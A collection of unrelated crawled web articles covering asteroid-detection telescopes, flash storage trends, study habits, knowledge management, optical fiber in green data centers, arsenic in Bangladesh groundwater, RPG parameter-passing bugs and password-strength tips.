- The existing Pan-STARRS1 (PS1) system operates a 1.8-meter aperture telescope on the island of Maui but this instrument only focuses its attention on NEO observations for about 11% of its observing time because of other science objectives. Even so, PS1 currently provides about 25% of the NEO discoveries, second only to the Catalina Sky Survey. Suitable funding to increase the percentage of time devoted to NEO searches on Pan-STARRS1, at the expense of other science, would accelerate the current NEO discovery rate, as would the full time or part time use of a second Pan-STARRS2 telescope that is nearing completion adjacent to the Pan-STARRS1 facility on Maui.
- An important planned future contributor is the Space Surveillance Telescope (SST), a 3.5-meter wide-field telescope that is being developed by MIT's Lincoln Laboratory for DARPA and the US Air Force. When fully operational in late 2014, this telescope will scan a wide region centered on the equatorial band of the night-time sky. Investigations are ongoing to better understand the efficiency with which this telescope will discover NEOs and what sort of scheduling might be intermingled with its prime mission of manmade space object surveillance to carry out these NEO observations.
- The most effective, ground-based NEO detection telescope that is currently in planned development is the Large Synoptic Survey Telescope (LSST), a 8.4-meter aperture, widefield telescope that is planned to begin operations in Chile in the early 2020s. To be funded by the National Science Foundation and a consortia of private and international agencies and universities for a variety of science programs, simulations have suggested that the shared use of LSST could catalog approximately 25% of the 140 meter sized NEOs within 5 years of operations and about 45% in ten years.
- Especially for the population of undiscovered sub-kilometer sized objects, space-based infrared telescopes would be a more efficient discovery system than the current ground-based optical surveys. This is because asteroids emit considerable heat, not just reflected sunlight, and this heat makes them bright in the infrared wavelengths, but these wavelengths are also unfortunately heavily filtered by the Earth's atmosphere. In addition, the view from an observatory orbiting the Sun interior to the Earth's orbit would have far better viewing coverage of hazardous objects farther away from Earth.
- Furthermore, a space-based telescope would not have to deal with downtime due to weather and daylight. Ground-based telescopes have difficulty distinguishing a large, dark asteroid from a small, bright asteroid, often making asteroid size measurements very uncertain. On the other hand, space-based infrared measurements can infer an asteroid's size with an uncertainty of only about 10% and its reflectivity to about 20%.
- The NASA-funded ground-based ATLAS system currently under development at the University of Hawaii is a relatively low cost, wide-field telescopic survey designed to patrol the entire accessible night sky every night to provide suitable impact warnings for small asteroids on near-term Earth impacting trajectories. Simulations suggest that the ATLAS system, consisting of 3 to 4 sites worldwide, will find almost all objects larger than 30 meters coming at us from the night sky and provide a week's warning time. Current search programs are designed to find larger potentially hazardous objects well in advance of a predicted impact so that existing technologies (e.g., spacecraft rendezvous and impacts) could be employed to deflect the object out of harm's way.
- A space-based infrared telescope in either a Venus-like orbit or interior to the Earth on the Sun-Earth line would be far more efficient finding NEOs than would existing, or planned, ground-based optical surveys. For the more numerous population of smaller NEOs that can still do significant ground damage, an infrared telescope in that location would be well positioned to find those smaller objects making close Earth approaches. A successful space-based IR survey telescope in a Venus-like orbit would be very effective in discovering NEOs further in advance and providing positional observations unavailable from Earth-based telescopes. Together these observations would allow a faster refinement of an asteroid's orbit so that impact predictions could also be updated more quickly. Hence these space-based observations might provide an early "all clear" and avoid otherwise unnecessary concern and unneeded deflection mission planning or initiation.
Such a telescope is in fact being developed by a privately held group called the B612 Foundation. Ed Lu, CEO of the B612 Foundation testified the group is philanthropically funded and in the process of building what it calls the Sentinel Space Telescope which it intends to launch by 2018.
Lu said the group's prime contractor is Ball Aerospace, located in Boulder, CO. Ball has previously built the Kepler Space Telescope, and the Spitzer Infrared Space Telescope on which Sentinel is largely based. We do have some non-financial support from NASA, which is providing use of the antennas of the Deep Space Network for telemetry and tracking, in addition to some technical consulting.
"Sentinel will orbit the Sun interior to the Earth, in a solar orbit similar to that of the planet Venus. From that vantage point, Sentinel will be able to continuously look outwards away from the Sun while scanning Earth's orbit. This vantage point combined with Sentinel's ability to track asteroids from greater distances, means that Sentinel will typically be able to track an individual asteroid for several months at a time, which allows the orbit of that asteroid to be determined accurately. This is critical because many asteroids will have orbits which at first may appear to pose a threat to Earth until further observations can be used to refine our knowledge of the asteroid orbit well enough to rule out an impact. This is problem for telescopes located on or near Earth, as many asteroids can only be observed for a few weeks and then cannot be observed for long periods of time (often many years) because these asteroids recede in their orbits to the other side of the Sun for extended periods.
Sentinel will orbit the Sun every 8 months, and so it will be able to observed and track these asteroids much more frequently, and therefore will be able to refine the orbits of such asteroids much faster. This will reduce incidences of asteroids having long periods of uncertainty such as we witnessed for the asteroid Apophis from 2004 until about 2010 (when our data was insufficient to be able to rule out an impact with Earth)," Lu stated.
Yeoman's concluded: "For the millions of small NEOs, in the range of 30 to 50 meters, it would be extremely challenging to find the majority of this population far enough in advance to first determine which ones represent a threat and then deflect them safely away from Earth. And meeting such a challenge may not be cost effective. It may be sufficient to simply detect these small asteroids a few days or weeks prior to Earth impact so that appropriate warnings could be made and evacuations undertaken similar to hurricane emergencies in the unlikely case where populated areas of Earth would be threatened. A warning of this type would also assure affected nations that the coming explosive blast would be a natural phenomena rather than a hostile act. One of the issues with which policy makers will need to wrestle is where to draw the line as to the minimum NEO size that represents so large a threat as to require deflection attempts. Objects below that limit would then require only advance warning. Cost benefit studies would shed some light on this issue."
Check out these other hot stories: | <urn:uuid:906de4dc-e510-4010-8add-c11fe21cb364> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2224462/security/can-nasa--air-force--private-industry-really-mitigate-asteroid-threat-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00061-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952118 | 2,350 | 3.546875 | 4 |
Flash is just seven years old this year, and applications are just beginning to really take advantage of it, so a discussion of its demise and the arrival of alternatives may seem premature. The reality is that flash opened Pandora's Box on the storage front and upset a long period of stagnation. Innovation is happening fast now in the storage industry.
In addition to efforts to evolve from 2D flash to 3D flash, the industry is developing at least seven storage technologies touted as faster and denser successors to today's flash.
The developments come as flash is starting to hit the limits of physics. Both the density and the speed of current technologies are topped out. The density issue is leading to a generation of 3D NAND where storage cells are stacked vertically on a die, instead of horizontally. This will increase capacity per die into the terabit range, though it adds cost, both in processing and in flaw management.
Stacking die is another option that's attractive. The driving forces are performance and power dissipation. Using a technology called "through-silicon via," die can be stacked on top of one another with connections going from one layer to the next. This technology becomes really interesting with the Hybrid Memory Cube (HMC) architecture, which uses many serial links for the through-via communications and stacks DRAM or flash together.
HMC uses very little power, saving perhaps 80% over today's solutions for DRAM. It's also much faster. The current specification envisions terabyte-per-second speeds.
With 3D flash, the main result will be small devices with lots of memory, perhaps including 1-inch SSD and multi-terabyte 2.5-inch products. Throw in HMC, and we will see memory stacked on to CPUs directly, with capacities in the terabyte range for DRAM and multiple terabytes for flash.
Super-chip modules such as these will power in-memory databases and HPC systems, and they will expand virtualization and hosted desktops, but there will be spinoffs once the TSV process gets ironed out and is cheap enough to be mainstream. These include baby super-chip stacks for mobile devices, for instance.
For all these gains, however, flash is less than ideal as a DRAM extender. It's just too slow. Writing is often sped up in flash or SSD devices by using some DRAM as a write buffer, but this doesn't handle the read speed mismatch that we would see in HMC, and even the best caching algorithms can't solve that problem.
This is where the next innovations in solid-state storage become important. Most of these emerging technologies boast much faster speed, getting close to DRAM levels. Most are denser, at least in theory. But most are still in the research labs.
The likeliest contenders are spintronic memory, which is in production in very small capacities, and resistive RAM. There are claims for demonstrations of terabit spin memory, but the money is on ReRAM winning the race, at least at the moment. With that technology, we might get to half the latency of a DRAM cell. Combine it with the parallel access approach of HMC, and that would be very acceptable performance.
In the longer term -- perhaps a decade out -- graphene interconnect and its use as a substrate hold promise for speeding up CPU and memory transistors while drastically reducing power. This would allow 3D stacking of CPU cores and DRAM pages. It would also open up a market for very large, inexpensive solid-state drives as replacements for today's spinning disk bulk storage.
Flash underpins much of the change occurring in IT today. That's why it sees such strong evolutionary pressures. Persistent solid-state memory is clearly a technology area to watch, and how it moves forward will affect the whole IT community in major ways. | <urn:uuid:2ed3b531-cc7d-4a0d-b3f2-1ad2aaec8d3d> | CC-MAIN-2017-04 | http://www.networkcomputing.com/storage/whats-next-flash/623109203?piddl_msgorder=asc | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00365-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953165 | 787 | 2.609375 | 3 |
Conduct in the Classroom
Most of us have spent some time in a classroom in our lives, and many of us will do so again, whether it’s for a certification program, technical training, soft skills seminar, etc. Few of us, however, have probably given too much thought to how we conduct ourselves in a classroom setting and how particular approaches might help us learn better.
With that in mind, this week’s Study Guide will focus on some of the ways in which students can get more out of their classroom experiences. (For the purposes of this article, the “classroom” is limited to the live lecture format.)
- Do your homework. Before you take the class, that is. You need to know whether this will really help you achieve your career goals, so thoroughly evaluate what subjects the course will cover, who will teach it, what materials will be used and how much all of it will cost. Remember: This is an investment. Make sure you put your time, effort and money into something that will pay off down the line.
- Get there on time. This is important not only because you don’t want to miss anything but also because it’s a courtesy to your instructors and fellow students. If you come in after the class has started, it will be a disruption, no matter how stealthily you manage to sneak in. You’ll still have to find a seat and get out all of your note-taking implements. Plus, getting to class early allows you to better accomplish the next step…
- Find a good spot. When looking for a spot in the classroom, you’ll want to consider a few factors. First, what’s a good distance for actually taking in the sights and sounds of the lecture? How large is the room? Will the instructor be using any multimedia tools?
Also, try to avoid any distractions. If there’s a window in the room, don’t sit where you’ll be tempted to spend most of the session enjoying the view instead of paying attention to the teacher. Ditto for attractive classmates.
- Ask questions. You definitely want to try to pick your instructor’s brain, and a great way to do so is by asking questions in class. There’s a right way and a wrong way to do this, however. For starters, don’t just blurt out any question you can think of. If some query pops into your head during the lecture, wait a few minutes to see whether the teacher gets to it. If not, then wait for the brief lull in the talk that comes during a transition to another topic or, if it doesn’t come, the end of the class.
- Review what was covered. Following the session, look over your notes to see what was discussed, what you might be unclear about and what might have been missed. You can save those questions for the next class, or you might be able to contact your instructor before then. Many teachers today give students their e-mail addresses, and they welcome correspondence during off-hours. If you have that opportunity, take advantage of it. | <urn:uuid:ce10bb19-840e-47a4-9bca-b273f9409442> | CC-MAIN-2017-04 | http://certmag.com/conduct-in-the-classroom/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00181-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957817 | 655 | 2.578125 | 3 |
Five-Minute Breaks the Key to Attentiveness
Have you ever thought that you were paying attention during a lecture or a while reading a book, and then 10 minutes or three pages later, you realize that you have no idea what was said or read? I don’t know about you, but I have definitely been there. My guess is that you have been there as well—especially while studying or sitting in a classroom for a prolonged period.
Studies show that just as people’s muscles can give out after grueling non-stop exercise, a person’s brain can automatically shut down after prolonged sessions of studying or learning. Therefore, study breaks may be the key to effective learning and paying attention.
Experts suggest that for every 50 minutes of lecture or study that a five-minute break be taken after the first 25 minutes. Simply taking five minutes to stop, stand up, stretch and walk around will make a big difference in your ability to stay focused and retain information. And of course, the longer the study period, the longer the break gets. Another good rule of thumb is that when your mind begins to wander off, it is most likely a sign that you need to take a break.
Nevertheless, remember you have to be willing to allocate your attention in the first place. You have to truly engage your mind with the words on the page or the lecture given by the instructor.
I once had an art history professor—need I say more?—who believed that even if you were to sleep through his entire presentation, somehow the information may seep in, so it was better to attend class rather than sleep in at home. I am not saying that he was unwise, but seriously, most of us cannot even remember our dreams, let alone what TV show is playing in the background while taking a nap.
Another way to improve your attention span is by focusing on one task. Do not multi-task while trying to learn. (That includes studying while watching the latest episode of “24.”) Giving into the entertainment bug while studying will only serve as a distraction, and that study time will likely be worthless.
After reading this, you may be thinking, “Of course I need to pay attention while studying or in a classroom. Isn’t that common sense?” Well, it may just be common sense, but I know that I need to hear the statement, “Snap out of it,” every so often. | <urn:uuid:045d6e7c-4a58-40e8-99d4-33588d133746> | CC-MAIN-2017-04 | http://certmag.com/five-minute-breaks-the-key-to-attentiveness/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00089-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.970723 | 510 | 2.984375 | 3 |
Knowledge Management examines how we acquire, organize, manage, share, and utilize knowledge and information. The Internet gives us an overwhelming amount of information on a daily basis — and the volume of information available is growing rapidly! One of the biggest challenges for individuals and organizations involved in project management is to make the best use of this knowledge and information so they can operate more efficiently, improve decision making, and sustain a competitive advantage.
What Is Knowledge Management?
Simply put, it is how information is converted into knowledge that is an asset to the organization. We learn from each project we complete, but without management support and knowledge management tools and processes in place, this knowledge is routinely lost during the project lifecycle, and it may take a cultural shift to recognize the strategic importance and value of knowledge and information.
Why Knowledge Management?
Knowledge management uses knowledge as an organizational benefit that is an essential component of project management. Organizations that make the greatest use of their knowledge assets understand the competitive advantage they can develop as they manage projects smartly and more efficiently.
People, Process, and Tools
Knowledge management is about how to systematically develop and share knowledge throughout the organization. Adopting knowledge management in an organization involves three major items.
- People: This involves understanding the importance of knowledge and information to organizational success.
- Process: This involves having a framework for knowledge management in the organization and embedding that framework into project management processes and methodology.
- Tools: Some of the tools and technologies that can facilitate managing and sharing knowledge and information include document management systems, online communities through the use of web portals, data repositories for storing and retrieving lessons learned, and Web 2.0 tools such as wikis and blogs.
How to Apply Knowledge Management to Your Projects
Knowledge management and project management are complimentary practices that can work hand-in-hand to improve organizational performance. First you need to demonstrate the value of knowledge management practices, and then you can introduce knowledge management into the project management process and methodology.
The project manager can serve as a mentor or change agent to establish knowledge management activities as part of the project work. Once team members experience the benefit of knowledge sharing, they are more inclined to participate in the process.
When closing out a project, don’t forget to store important project artifacts (e.g. project charter, WBS, schedule, communication plan, risk and issues log, change control documents); these can serve as templates for future projects. The post-project review is a way to capture information for the knowledge repository. Beneficial knowledge provides long-term benefit in terms of improving organizational performance and fostering a learning organization.
Knowledge is increasingly being valued as a strategic asset essential to sustaining a competitive advantage. Knowledge management provides a way to capture knowledge from projects in as close to real time as possible, transfer the data and information, and apply those learnings to future projects. Applying knowledge management techniques to project management practices can result in enhanced communication and better project integration, improved decision-making, reduced risks, and continuous improvement in project performance. | <urn:uuid:cfded033-de99-4252-b0a7-eb063d3f4a7f> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2012/08/24/how-to-apply-knowledge-management-to-project-management/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00117-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.911838 | 625 | 3.0625 | 3 |
With the amount of energy now required to power the world’s data centers, one of the greatest challenges in today’s data centers is minimizing costs associated with power consumption and cooling, which is also the requirement of building the green data center. Higher power consumption means increased energy costs and greater need for heat dissipation. This requires more cooling, which adds even more cost. Under these circumstances, high-speed optical fiber offers a big advantage over copper to reduce the network operational and cooling energy.
What Is Green Data Center?
The word “green” invokes natural images of deep forests, sprawling oak trees and financial images of dollar bills. The topic of green has been gaining momentum across international, commercial and industrial segments as global warming and greenhouse gas effects hit headlines. In terms of different fields, the word “green” has different definitions. Specific to the data center segment of the telecommunications industry, green data center is a repository for the storage, management, and dissemination of data in which the mechanical, lighting, electrical and computer systems are designed for maximum energy efficiency and minimum environmental impact.
How to Build Green Data Center?
Green data center address two issues which plague the average data center. One is the power required to run the actual equipment, the other is the power required to cool the equipment. Reduced the power required will effectively lessen not only the energy consumption but also the impact on environment. Green solutions include:
How Does Optical Fiber Benefit the Green Data Center Building?
Compared to copper cable, optical fiber may offer many advantages in contribution to building green data center. Usually, optical fiber connectivity can enhance green data center installations by utilizing high-port-density electronics with very low power and cooling requirements. Additionally, an optical network provides premier pathway and space performance in racks, cabinets and trays to support high cooling efficiency when compared to copper connectivity. All these advantages can be summarized as the following three points.
Lower Operational Power Consumption
Optical transceiver requires less power to operate compared to copper transceiver. Copper requires significant analog and digital signal processing for transmission that consumes significantly higher energy when compared to optical media. A 10G BASE-T transceiver in a copper system uses about 6 watts of power. A comparable 10G BASE-SR optical transceiver uses less than 1 watt to transmit the same signal. The result is that each optical connection saves about 5 watts of power. Data centers vary in size, but if we assume 10,000 connections at 5 watts each, that’s 50 kW less power—a significant savings opportunity thanks to less power-hungry optical technology.
Less Cooling Power Consumption
Optical system requires far fewer switches and line cards for equivalent bandwidth when compared to a copper card. Fewer switches and line cards translate into less energy consumption for electronics and cooling. One optical 48-port line card equals three copper 16-port line cards (as shown in the following picture). A typical eight-line card chassis switch would have 384 optical ports compared to 128 copper ports. This translates into a 3:1 port advantage for optical. It would take three copper chassis switches to have equivalent bandwidth to one optical chassis switch. The more copper chassis switches results in more network and cooling power consumption.
More Effective Management for Better Air-flow
Usually, a 0.7-inch diameter optical cable would contain 216 fibers to support 108 10G optical circuits, while 108 copper cables would have a 5.0-inch bundle diameter. The larger CAT 6A outer diameter impacts conduit size and fill ratio as well as cable management due to the increased bend radius. Copper cable congestion in pathways increases the potential for damage to electronics due to air cooling damming effects and interferes with the ability of ventilation systems to remove dust and dirt. Optical cable offers better system density and cable management and minimizes airflow obstructions in the rack and cabinet for better cooling efficiency. See the picture below: the left is a copper cabling system and the right is an optical cabling system.
Data center electrical energy consumption is projected to significantly increase in the next five years. Solutions to mitigate energy requirements, to reduce power consumption and to support environmental initiatives are being widely adopted. Optical connectivity supports the growing focus on a green data center philosophy. Optical cable fibers provide bandwidth capabilities that support legacy and future-data-rate applications. Optical fiber connectivity provides the reduction in power consumption (electronic and cooling) and optimized pathway space utilization necessary to support the movement to greener data centers. | <urn:uuid:46e75fb0-3a33-4129-9dfc-872a5dacfa32> | CC-MAIN-2017-04 | http://www.fs.com/blog/optical-fiber-benefits-the-green-data-center-building.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281226.52/warc/CC-MAIN-20170116095121-00511-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.905092 | 913 | 3.3125 | 3 |
(1) A data structure accessed beginning at the root node. Each node is either a leaf or an internal node. An internal node has one or more child nodes and is called the parent of its child nodes. All children of the same node are siblings. Contrary to a physical tree, the root is usually depicted at the top of the structure, and the leaves are depicted at the bottom. (2) A connected, undirected, acyclic graph. It is rooted and ordered unless otherwise specified.
Thanks to Joshua O'Madadhain (email@example.com) for the figure, 6 October 2005.
Formal Definition: (1) A tree is either
Specialization (... is a kind of me.)
heap, B-tree, binary tree, balanced tree, multiway tree, complete tree, search tree, digital tree.
See also other vocabulary: descendant, ancestor, tree traversal, height, depth, degree (3), technical terms: ordered tree, rooted tree, free tree, arborescence.
Note: Appearing in the Dictionary of Computer Science, Engineering and Technology, Copyright © 2000 CRC Press LLC.
A tree in the data structure sense (1) is not the same as a tree in the graph sense (2). Consider possible binary trees with two nodes. There are two possible data structures: a root and a left subtree or a root and a right subtree. However there is only one possible graph: a root and a subtree. The graph definition doesn't allow for "the subtree is the right subtree and the left subtree is empty". Also there is no "empty" graph tree.
Thanks to Sharat Chandran (firstname.lastname@example.org) for clarifying the difference between these two senses.
The formal definition is after [CLR90, page 94].
If you have suggestions, corrections, or comments, please get in touch with Paul Black.
Entry modified 14 August 2008.
HTML page formatted Mon Feb 2 13:10:40 2015.
Cite this as:
Paul E. Black and Algorithms and Theory of Computation Handbook, CRC Press LLC, 1999, "tree", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 14 August 2008. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/tree.html | <urn:uuid:f05f1bae-6ca9-4141-a130-8e2ce2fee81d> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/dads/HTML/tree.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280718.7/warc/CC-MAIN-20170116095120-00539-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.874337 | 518 | 3.625 | 4 |
Chakraborti D.,Jadavpur University |
Rahman M.M.,Jadavpur University |
Rahman M.M.,University of South Australia |
Das B.,Jadavpur University |
And 11 more authors.
Water Research | Year: 2010
Since 1996, 52,202 water samples from hand tubewells were analyzed for arsenic (As) by flow injection hydride generation atomic absorption spectrometry (FI-HG-AAS) from all 64 districts of Bangladesh; 27.2% and 42.1% of the tubewells had As above 50 and 10 μg/l, respectively; 7.5% contained As above 300 μg/l, the concentration predicting overt arsenical skin lesions. The groundwater of 50 districts contained As above the Bangladesh standard for As in drinking water (50 μg/l), and 59 districts had As above the WHO guideline value (10 μg/l). Water analyses from the four principal geomorphological regions of Bangladesh showed that hand tubewells of the Tableland and Hill tract regions are primarily free from As contamination, while the Flood plain and Deltaic region, including the Coastal region, are highly As-contaminated. Arsenic concentration was usually observed to decrease with increasing tubewell depth; however, 16% of tubewells deeper than 100 m, which is often considered to be a safe depth, contained As above 50 μg/l. In tubewells deeper than 350 m, As >50 μg/l has not been found. The estimated number of tubewells in 50 As-affected districts was 4.3 million. Based on the analysis of 52,202 hand tubewell water samples during the last 14 years, we estimate that around 36 million and 22 million people could be drinking As-contaminated water above 10 and 50 μg/l, respectively. However for roughly the last 5 years due to mitigation efforts by the government, non-governmental organizations and international aid agencies, many individuals living in these contaminated areas have been drinking As-safe water. From 50 contaminated districts with tubewell As concentrations >50 μg/l, 52% of sampled hand tubewells contained As <10 μg/l, and these tubewells could be utilized immediately as a source of safe water in these affected regions provided regular monitoring for temporal variation in As concentration. 
Even in the As-affected Flood plain, sampled tubewells from 22 thanas in 4 districts were almost entirely As-safe. In Bangladesh and West Bengal, India, the crisis is not one of having too little water to satisfy our needs; it is the challenge of managing available water resources. The development of community-specific safe water sources, coupled with local participation and education, is required to slow the current effects of widespread As poisoning and to prevent this disaster from continuing to plague individuals in the future. © 2010 Elsevier Ltd.
Fundamentals: Parameter Passing
November 29, 2016 Jon Paris
Even though high-level languages make it unnecessary–and in many cases, difficult–to understand what is going on “under the covers,” I have always found a basic knowledge of internal processes to be invaluable. This is particularly true when it comes to resolving mystery bugs. I was reminded of this recently by a number of problems related to parameter passing that appeared on Internet lists and also in my email directly from customers.
My need to understand internals is due, at least in part, to the fact that I learned assembler and other low-level languages at an early stage in my career. Actually, the very first thing I learned was how to program calculators and tabulators using plug boards. With those things you had to understand the mechanics of what was going on!
I’m going to start my discussion of parameter passing from the beginning, so apologies to those readers who already know some of this stuff.
The most important thing to remember is that when you pass a parameter from one program to another, you are not passing any data. What you are passing is a pointer to (i.e., the memory address of) the first byte of the parameter’s storage in the originating program. And that is all that you are passing.
This is important to understand because it means that it is the receiving program that effectively defines what that parameter looks like in terms of data type and length, and that can cause some “interesting” problems if you are not careful. Let’s look at a simple example to see what I mean.
(A) Dcl-pr CallTgt1 extPgm;
      request char(4) Const;
      result char(10);
    End-Pr;

(B) Dcl-ds data;
      parmData10 char(10) Inz('Input Parm');
      moreData char(30) Inz('Original value of moreData');
    End-Ds;

    Dcl-s wait char(1);

(C) Dsply ( 'parmData10 = [ ' + parmData10 + ' ]' );
    Dsply ( 'moreData = [ ' + moreData + ' ]' );

(D) CallTgt1 ( 'Fill': parmData10 );

(E) Dsply ( 'parmData10 = [ ' + parmData10 + ' ]' );
    Dsply ( 'moreData = [ ' + moreData + ' ]' );

    Dsply 'Press enter to continue' ' ' wait;
    *InLR = *On;
In the code above, notice that at (A) you can see the prototype for CALLTGT1, the program we are going to call. This program will change the content of the second parameter. Notice that the second parameter is defined as a 10-character variable.
At (B) you can see the definition of the variable parmData10, which will be passed (D) as that second parameter. Before we do the call, we display the content of both parmData10 and the variable moreData so that we can check their content.
Following the call at (D) we then display the content of the two variables again. Here are the results of running the program.
DSPLY  parmData10 = [ Input Parm ]
DSPLY  moreData = [ Original value of moreData ]
DSPLY  parmData10 = [ Fill ]
DSPLY  moreData = [ alue of moreData ]
As expected, the content of parmData10 has been changed. But notice that so has the content of the variable moreData. How could that have happened?
You’ll hopefully see the problem when you look at the source of the program being called. Here it is:
pgm ( &input &output )
  dcl &input *char 4
  dcl &output *char 20
  chgvar var(&output) value(&input)
endpgm
See a problem? Yup! The parameter defined as 10 characters in the calling program is defined as 20 long in the receiving program. So, when the four character &input variable is moved to &output, instead of six spaces being added as padding, as the programmer might be expecting, a total of 16 are added, with the result that the first 10 characters of the variable moreData are overwritten because moreData has the misfortune of following parmData10 in memory.
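The same overrun is easy to reproduce in any language that passes parameters by address. The following Python sketch is an analogy of my own (not RPG or CL): it uses ctypes to lay out two adjacent fixed-length fields mirroring the data structure above, then writes 20 blank-padded bytes through the address of the first field, exactly as the mismatched CL program does.

```python
import ctypes

# The caller's view of memory: two adjacent fixed-length fields,
# mirroring the RPG data structure (field names match the article).
class DataDS(ctypes.Structure):
    _fields_ = [("parmData10", ctypes.c_char * 10),
                ("moreData",   ctypes.c_char * 30)]

ds = DataDS(b"Input Parm", b"Original value of moreData")

# The callee believes the parameter is 20 bytes long, so it blank-pads
# its 4-byte input to 20 bytes and writes all of them through the
# address it was given -- 10 bytes past the end of parmData10.
padded = b"Fill".ljust(20, b" ")
ctypes.memmove(ctypes.addressof(ds) + DataDS.parmData10.offset, padded, 20)

print(ds.parmData10)   # b'Fill      '
print(ds.moreData)     # b'          alue of moreData'
```

Because the two fields are guaranteed adjacent inside the structure, the first 10 bytes of moreData are overwritten with blanks, reproducing the "alue of moreData" corruption shown in the program output.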
Sadly, spotting this kind of corruption is rarely this easy. Just to demonstrate the point, try making this simple change to the calling program. Reverse the order of the variables moreData and parmData10 in the data data structure (DS). The DS now looks like this:
Dcl-ds data;
  moreData char(30) Inz('Original value of moreData');
  parmData10 char(10) Inz('Input Parm');
End-Ds;
What do you think will happen now? Well, in this case the program runs successfully and the results look like this:
DSPLY  parmData10 = [ Input Parm ]
DSPLY  moreData = [ Original value of moreData ]
DSPLY  parmData10 = [ Fill ]
DSPLY  moreData = [ Original value of moreData ]
Looks good, right? No corruption in sight. Except we know that corruption must still be occurring! So where did those extra 10 spaces go? Your guess is as good as mine! Truth is that we have no clue exactly what data is now being overwritten. The RPG compiler places variables in memory in what, from our perspective, is a completely arbitrary sequence. In the original example I deliberately placed the variables in a DS because that is the only time that you can guarantee exactly where in memory variables are located relative to one another and therefore observe the corruption taking place. But even then, there is no way to know what follows the end of the DS.
It is important to understand this because it can be really hard to diagnose the results of such errors. I have seen cases where the corrupted variables were subsequently written back to the database by an UPDATE operation, only to be discovered weeks later, forcing a complete rebuild of the history file they were part of.
In another case, the corruption was originally to a print buffer but because the print line was assembled after the corruption had occurred, the program apparently ran correctly. And kept on running for many, many years. Then one day it had to be recompiled. The changes made by the programmer were trivial and had no impact on the memory layout, but in the interim period the compiler folks had changed the way that variable storage was generated. The result was that all of a sudden, the corruption was to important internal program control pointers, and a few minutes into the program run, “BOOM!”
So how do we avoid such errors? Well the answer is the use of prototypes or, to be more precise, accurate prototypes. The code I showed here is typical of what I often see on customer sites. The prototype, at label (A), was apparently written by the programmer who wrote the program that uses it. The clue is in the fact that the prototype was hard coded in the source, whereas it should really be coming in via a /COPY directive. If you ever see a hard-coded prototype in an RPG source, be suspicious–be very suspicious–and get rid of it as soon as possible.
That /COPY source should have been written by the programmer who coded the CL routine being called. When calling CL programs, we really have no choice but to manually ensure that the prototype matches the actual parameters used by the called program. For C functions and system APIs there are IBM-supplied prototypes, but if, like me, you don’t like the style and naming conventions of those, then a quick Internet search will often locate excellent examples written by others.
When the prototype relates to an RPG program, things are better. By coding the /COPY in the called program and in all the calling programs, we can ensure that the prototype is a valid representation of the interface. When both are present, the compiler will compare the prototype (PR) and procedure interface (PI) and fail the compile if they don’t match. While we love the recent relaxation of the compiler’s rules on prototypes (i.e., that we no longer need to code prototypes for internal subprocedures), it has a regrettable side effect; namely that prototypes are no longer necessary in any program that has a PI defined. As a result, you can get away with not /COPYing in the prototype, but resist the temptation. Let the compiler validate the prototype you plan to use and you’ll avoid problems down the road.
Externalizing and /COPYing prototypes may seem like extra work up front. But while you’re doing it, just imagine how many future bugs you may be preventing! COBOL and CL programmers, I’m afraid you are on your own, so be careful out there!
Jon Paris is one of the world’s most knowledgeable experts on programming on the System i platform. Paris cut his teeth on the System/38 way back when, and in 1987 he joined IBM’s Toronto software lab to work on the COBOL compilers for the System/38 and System/36. He also worked on the creation of the COBOL/400 compilers for the original AS/400s back in 1988, and was one of the key developers behind RPG IV and the CODE/400 development tool. In 1998, he left IBM to start his own education and training firm, a job he does to this day with his wife, Susan Gantner–also an expert in System i programming. Paris and Gantner, along with Paul Tuohy and Skip Marchesani, are co-founders of System i Developer, which hosts the new RPG & DB2 Summit conference. Send your questions or comments for Jon to Ted Holt via the IT Jungle Contact page.
Password…is not a good password
We live in a password-driven world. Passwords protect our finances, e-mail, computers, and even mobile devices. However, in the name of simplicity, we often choose either weak passwords or use the same passwords for every site we visit. This may be convenient, but it also opens us up to being hacked. Once a hacker has a single password, they have access to every site you visit. Above and beyond using different passwords for each site, there are a few simple rules to follow for creating a strong password:
• Passwords should be at least 10-12 characters in length and should not contain words found in the dictionary. A common password mistake is to replace letters in common words with numbers, such as substituting a zero for an “o” or the number three for an “e”; password-cracking dictionaries already account for these substitutions.
• A good way to create strong passwords is to use the first letter in each word of a phrase you can easily remember. For example: I love to have my mother watch the kids for the weekend! The password could be: 1lthmmwtkftW!
This is a very strong password that someone can remember by repeating the phrase. It is important to have both upper and lower case letters along with numbers and symbols for a strong password.
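The first-letter rule is mechanical enough to sketch in code. This illustrative Python snippet (the function name and the I-to-1 substitution rule are my own choices, not from the article) takes the first character of each word and keeps any trailing punctuation; note the article's version also capitalizes the final letter by hand to mix cases.

```python
def phrase_password(phrase: str) -> str:
    """Build a password from the first character of each word in a phrase."""
    chars = []
    for word in phrase.split():
        first = word[0]
        # One possible leet-style tweak: substitute "1" for "I".
        chars.append({"I": "1"}.get(first, first))
        # Keep punctuation that ends a word (e.g. the final '!').
        if word[-1] in "!?.,;":
            chars.append(word[-1])
    return "".join(chars)

print(phrase_password("I love to have my mother watch the kids for the weekend!"))
# -> 1lthmmwtkftw!
```

Varying the substitution and capitalization rules per person keeps the result memorable while avoiding dictionary words.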
